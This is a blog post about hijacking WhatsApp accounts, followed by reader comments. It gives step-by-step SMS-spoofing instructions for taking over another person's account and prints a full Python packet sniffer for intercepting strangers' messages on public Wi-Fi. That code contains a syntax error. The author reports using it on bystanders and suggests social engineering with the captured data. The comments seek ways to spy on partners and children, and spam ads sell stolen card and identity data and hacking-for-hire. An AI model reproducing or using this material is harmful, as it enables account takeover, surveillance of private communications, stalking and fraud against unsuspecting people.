FREE MOBILE RECHARGE | For latest useful tricks visit Here!

How to hack WhatsApp Messenger on Nokia, iPhone & Android


WhatsApp is a cross-platform messing application used by smartphones. It allows users to communicate instant messages and share media via 3G or WiFi with other users on the platform. Back in may 2011 WhatsApp had a security breach when hackers realized that messages were being transmitted unencrypted via plain text which left accounts open for hi-jacking. WhatsApp finally released a security update for this problem and the system became locked down.

REQUIREMENTS:
  • 7Zip – Click here to download
  • A Windows Computer (Windows XP, Vista, Win 7, Win 8)
  • A Phone running WhatsApp (iPhone, Android, Nokia, Blackberry etc)
Please upgrade your browser
In this article i will talk about alternative methods of hi-jacking WhatsApp messages and other protocols using a variety of methods.
The first hack im going to talk about will spoof WhatsApp and have it think you are somebody else allowing you to communicate under an alternative name. This hack works by tricking the WhatsApp Verification Servers by sending a spoofed request for an authorisation code intended for an alternative phone. This method is also known to work on several other IM applications based on iOS, Symbian & Android devices.

Hack 1

Install WhatsApp on your device
WhatsApp now starts a counter where it sends a verification message to its servers. If this verification fails after a specific time then WhatsApp offers alternative methods of verification. A message can be blocked by changing the message center number or pushing the phone into Airplane mode.
WhatsApp now offers an alternative method of verification
Choose verify through SMS and fill in your email address. Once you click to send the SMS click cancel to terminate the call for authorisation to the WhatsApp server.
Next we need to do some SMS-Spoofing
There are numerous ways of doing this for free. A quick google search will pull up a vast amount of services which can spoof email addresses.
If you are using an iPhone use the following details in the SMS spoofer application.
To: +447900347295
From: +(Country code)(mobile number)
Message: (your email address)
If you are using another device then check your outbox and copy the message details into the spoofer application and send the spoofed verification.
You will now receive messages intended for the spoofed number on your mobile device and you can communicate with people under the spoofed number.

Hack 2

The second attack I’m going to talk about is a little bit more professional. For users who can pull of MITM (Man in the Middle) Attacks this is a sure way to rake in data from a public network. I came across the script at the 0×80 blog so i I tried it on several public networks in Dublin (thanks to the karma code). The amount of data you can pull in from people sitting around you in a short amount of time is quite unreal. The code is written in Python so its nice and simple to work with and edit to make it work for similar chat applications.
You will also need to parse the traffic so check this link: http://www.secdev.org/projects/scapy/
Before you have a look at the code you may want to note that WhatsApp blurts out even more information for us to see. Doing a MITM Attack and peeking at the packets we can see that WhatsApp prints the mobile number and the name of the user your target is speaking with. This is important to note this because this data can be used for some social engineering (calling the person to pull more information from them) or by checking web resources such as Facebook or LinkedIn to find their address, email accounts, websites and what ever else your hunting for.

Example

DYN:~/whatsapp# python sniffer.py wlan0

#########################
## whatsapp sniff v0.1 ##
#########################

[+] Interface : wlan0
[+] filter : tcp port 5222

To : ***********
Msg : Hello, I will send you a file.

To : **********
Filename : .jpg
URL : https://mms*.whatsapp.net/a1/0/1/2/3/*md5hash*.jpg

From : ***********
Msg : Thanks file has been recieved, take this file too.

From : ***********
Filename : .jpg
URL : https://mms*.whatsapp.net/a2/0/2/3/1/*md5hash*.jpg

Code

#!/usr/bin/env python

import os
import sys
import scapy.all
import re

Previous_Msg = ""
Previous_Filename = ""
Files = []
Messages = []
Urls = []

def banner():
 print "#########################"
 print "## whatsapp sniff v0.1 ##"
 print "## qnix@0x80.org ##"
 print "#########################\n"

def whatsapp_parse(packet):
 global Previous_Msg
 global Previous_Filename
 global Files
 global Messages
 global Urls
 src = packet.sprintf("%IP.src%")
 dst = packet.sprintf("%IP.dst%")
 sport = packet.sprintf("%IP.sport%")
 dport = packet.sprintf("%IP.dport%")
 raw = packet.sprintf("%Raw.load%")

 # Target Sending stuff
 if dport == "5222":
 Filename = ""
 toNumber = ""
 Url = ""
 Msg = ""
 try:
 toNumber = re.sub("\D", "", raw)
 if(toNumber[5:16].startswith("0")): toNumber = toNumber[6:17]
 else: toNumber = toNumber[5:16]
 try:
 Filename = raw.split("file\\xfc")[1][1:37]
 Url = raw.split("file\\xfc")[1].split("\\xa5\\xfc")[1].split("\\xfd\\x00")[0][1:]
 except:pass
 try: Msg = raw.split("\\xf8\\x02\\x16\\xfc")[1][4:-1].decode("string_escape")
 except:pass
 except: pass
 if(len(toNumber) >= 10):
 if(len(Msg) >= 1 and Previous_Msg != Msg):
 Previous_Msg = Msg
 print "To : ", toNumber
 print "Msg : ", Msg
 Messages.append(Msg)
 elif(len(Filename) >= 1 and Previous_Filename != Filename):
 Previous_Filename = Filename
 print "To : ", toNumber
 print "Filename : ", Filename
 print "URL : ", Url
 Files.append(Filename)
 Urls.append(Url)

 # Recieved Messages
 if sport == "5222":
 Msg = ""
 fromNumber = ""
 Url = ""
 Filename = ""
 try:
 fromNumber = re.sub("\D", "", raw)
 if(fromNumber[5:16].startswith("0")): fromNumber = fromNumber[6:17]
 else: fromNumber = fromNumber[5:16]
 try:
 Filename = raw.split("file\\xfc")[1][1:37]
 Url = raw.split("file\\xfc")[1].split("\\xa5\\xfc")[1].split("\\xfd\\x00")[0][1:]
 except: pass
 try: Msg = raw.split("\\x02\\x16\\xfc")[1][4:-1].decode("string_escape")
 except: pass
 except:pass
 if(len(fromNumber) = 1 and Previous_Msg != Msg):
 Previous_Msg = Msg
 print "From : ", fromNumber
 print "Msg : ", Msg
 Messages.append(Msg)
 elif(len(Filename) >= 1 and Previous_Filename != Filename):
 Previous_Filename = Filename
 print "From : ", fromNumber
 print "Filename : ", Filename
 print "URL : ", Url
 Files.append(Filename)
 Urls.append(Url)
def callback(packet):
 sport = packet.sprintf("%IP.sport%")
 dport = packet.sprintf("%IP.dport%")
 raw = packet.sprintf("%Raw.load%")
 if raw != '??':
 if dport == "5222" or sport == "5222":
 whatsapp_parse(packet)

def main():
 banner()
 if(len(sys.argv) != 2):
 print "%s " % sys.argv[0]
 sys.exit(1)
 scapy.iface = sys.argv[1]
 scapy.verb = 0
 scapy.promisc = 0
 expr = "tcp port 5222"

 print "[+] Interface : ", scapy.iface
 print "[+] filter : ", expr
 scapy.all.sniff(filter=expr, prn=callback, store=0)

 print "[+] iface %s" % scapy.iface

if __name__ == "__main__":
 main()

SHARE THIS POST   

  • Facebook
  • Twitter
  • Myspace
  • Google Buzz
  • Reddit
  • Stumnleupon
  • Delicious
  • Digg
  • Technorati
Author: Anonymous

42 comments:

  1. i wonder if there's any hack specially made for google play where you can download paid games for free

    ReplyDelete
    Replies
    1. just go to 4shared.com create an acc and then search for the paid apps u talking abt . u can check them on filecrop

      Delete
  2. @Anonymous- My Pleasure buddy..
    @business phone- Thanks pal for your comment, soon I'll post that trick, till then keep visiting and don't forget to subscribe.

    ReplyDelete
  3. How can we communicate privately?

    ReplyDelete
  4. can i hake conversation

    ReplyDelete
  5. can i hake friends contacts and conversation

    ReplyDelete
  6. If you've IP networking basics and decent programming knowledge, you can do it. The method involves MAC spoofing. http://geeknizer.com/how-to-hack-whatsapp-messenger/

    ReplyDelete
  7. Am suspicious abt my lover, wats the best Method to hack into her FACEBOOK ACC or WATS APP. . .(Note) .she stays very far away from,

    ReplyDelete
  8. When i try to connect watsapp from my nokia x2-00 it shows error server could not connect so what to do now

    ReplyDelete
    Replies
    1. @शिवश्री- From where you have downloaded the whatsapp messenger ?
      OR
      Remove that app and download Whatsapp from this link-
      1. https://www.dropbox.com/s/dg0wcs7lzqkcfc1/whatsapp_qvs9c38b.jar
      or
      2. https://www.dropbox.com/s/648pa5lkv31bcco/whatsapp_o3nkn3l7.jar

      Delete
  9. May i know any website which i can send spoof sms? I tried but all asking me to pay. please help.

    ReplyDelete
    Replies
    1. @Anonymous- Yes you can spoof sms from
      http://www.smsglobal.com

      but they dont allow unlimited access. They give only 25 credits free trial, which is much better then other paid sites.

      Delete
  10. Hey the email option does not appear to me after the failure to connect with whats app servers , all i get is the sms option without an email and then the call option any help please ?

    ReplyDelete
  11. Dear Admin,

    Really a great effort. Appreciated. I also need some advice and guidance in this regard, I want to check the victims whatsapp Contacts and Texts. I know the victims IMEI number, Mobile Number and the model as well, its Symbian, Nokia C3. Please guide me how can it possible for me to get access to it. Thank you so much.

    All the best.

    ReplyDelete
    Replies
    1. Hi! I have the same problem as you. Have you solved it? If yes, could you please tell me how or who helped you?

      Delete
  12. This is indeed interesting stuff. I didn't believe it first, because of the fact that different sources (and newspapers) reported that hacking Whatsapp is not possible anymore. I did once download a good Whatsapphack from this place, but it seems it doesn't work anymore.

    ReplyDelete
  13. Boss....it looks cool but i m really new to this...so just tell me karna kyaa dai

    ReplyDelete
  14. Guys can I have an app foe whatapp hack because I'm no longer using PC and notebooks I only use windows phone 8

    ReplyDelete
    Replies
    1. ohhh I want, give me please...please i need so much :))

      Delete
  15. Is there a simple way to hack into someone's messages if you just have their mobile number?

    ReplyDelete
  16. I want to know how can i hack my boyfriend'z whatzapp and text..i jst want to spy..he is ignoring me nd i want to kniw who is d reason..pls pks help me

    ReplyDelete
  17. this is confusing for an average person

    ReplyDelete
  18. Mujhe bhi wtsap hack karna h pr mujhe hacking ka h bi nhi ata :(

    ReplyDelete
  19. Would You Like To Do Guest Blogging With Us...
    Or If you need A guest blogger do Reply ....?
    It will Help Both Of us increase website ranking...

    My Website -- >> TechZine-Inspirations ~ Blogger Template

    ReplyDelete
  20. how can i hack my kids whatsapp

    ReplyDelete
  21. This comment has been removed by the author.

    ReplyDelete
  22. i recommend bestcyberguru@-g-m=a-i=l .c-o=m for any phone spying or gps tracking services. with their help , I was able to spy on my wifes iPhone 11 Pro to see alll her text messages, phone calls, facebook messenger chats, whatsapp chats and more! they were able to install my iphone 8 as the mirror phone so i was viewing everything remotely without stress! just contact bestcyberguru@-g-m=a-i=l .c-o=m

    ReplyDelete
  23. If you ever want to change or up your university grades contact cybergolden hacker he'll get it done and show a proof of work done before payment. He's efficient, reliable and affordable. He can also perform all sorts of hacks including text, whatsapp, password decrypt,hack any mobile phone, Escape Bancruptcy, Delete Criminal Records and the rest

    Email: cybergoldenhacker at gmail dot com

    ReplyDelete
  24. *SELLING ACTIVE US CC CVV FULLZ*
    ------------------------------------

    ==>COST $5 FOR EACH CC FULLZ<==

    *DUMP TRACKS 1 & 2 WITH PIN*

    ==>Dumps prices
    ==>Tracks 1&2 US = 85$ per 1


    ALL ARE FRESH, VALID & TESTED.

    WANT TO BUY, JUST CONTACT ON:

    ************************************
    =>Email > leads.sellers1212@gmail.com
    =>Whatsapp > +92 317 2721122
    =>Telegram > @leadsupplier
    =>ICQ > 752822040

    ************************************

    INFO AVAILABLE:

    =>CARD TYPE
    =>FIRST NAME & LAST NAME
    =>CC NUMBER
    =>EXPIRY DATE
    =>CVV
    =>FULL ADDRESS (ZIP CODE, CITY/TOWN, STATE)
    =>PHONE NUMBER,DOB,SSN
    =>MOTHER'S MAIDEN NAME
    =>VERIFIED BY VISA
    =>CVV2

    *GOOD BALANCE
    *DON'T ASK FOR SAMPLE OR SCREENSHOT
    *ALL INFO/DETAILS WILL BE PROVIDE
    *PAYMENT IN ADVANCE
    *DATA WILL BE SENT IN FEW MINS AFTER PAYMENT

    =====================================

    ReplyDelete
  25. Hi All!

    We are selling fresh & genuine SSN Leads, with good connectivity. All data is tested & verified.
    Headers in Leads:

    First Name | Last Name | SSN | Dob | Address | State | City | Zip | Phone Number | Account Number | Bank Name | DL Number | Routing Number | IP Address | Reference | Email | Rental/Owner |

    *You can ask for sample before any deal
    *Each lead will be cost $1
    *Premium Lead will be cost $5
    *If anyone wants in bulk I will negotiate
    *Sampling is just for serious buyers

    Hope for the long term deal
    For detailed information please contact me on:

    Whatsapp > +923172721122
    email > leads.sellers1212@gmail.com
    telegram > @leadsupplier
    ICQ > 752822040

    ReplyDelete
  26. Selling USA FRESH SSN Leads/Fullz, along with Driving License/ID Number with good connectivity.

    **PRICE FOR ONE LEAD/FULLZ 2$**

    All Leads are Tested & Verified.
    Fresh spammed data.
    Good credit Scores, 700+ minimum scores.

    **DETAILS IN LEADS/FULLZ**

    ->FULL NAME
    ->SSN
    ->DATE OF BIRTH
    ->DRIVING LICENSE NUMBER
    ->ADDRESS WITH ZIP
    ->PHONE NUMBER, EMAIL
    ->EMPLOYEE DETAILS

    ->Bulk order negotiable
    ->Minimum buy 25 to 30 leads/fullz
    ->Hope for the long term business
    ->You can asked for specific states too

    **Contact 24/7**

    Email > leads.sellers1212@gmail.com

    Telegram > @leadsupplier

    ICQ > 752822040

    ReplyDelete
  27. How To Hack Whatsapp Messenger On Nokia, Iphone And Android >>>>> Download Now

    >>>>> Download Full

    How To Hack Whatsapp Messenger On Nokia, Iphone And Android >>>>> Download LINK

    >>>>> Download Now

    How To Hack Whatsapp Messenger On Nokia, Iphone And Android >>>>> Download Full

    >>>>> Download LINK

    ReplyDelete
  28. How To Hack Whatsapp Messenger On Nokia, Iphone And Android >>>>> Download Now

    >>>>> Download Full

    How To Hack Whatsapp Messenger On Nokia, Iphone And Android >>>>> Download LINK

    >>>>> Download Now

    How To Hack Whatsapp Messenger On Nokia, Iphone And Android >>>>> Download Full

    >>>>> Download LINK cy

    ReplyDelete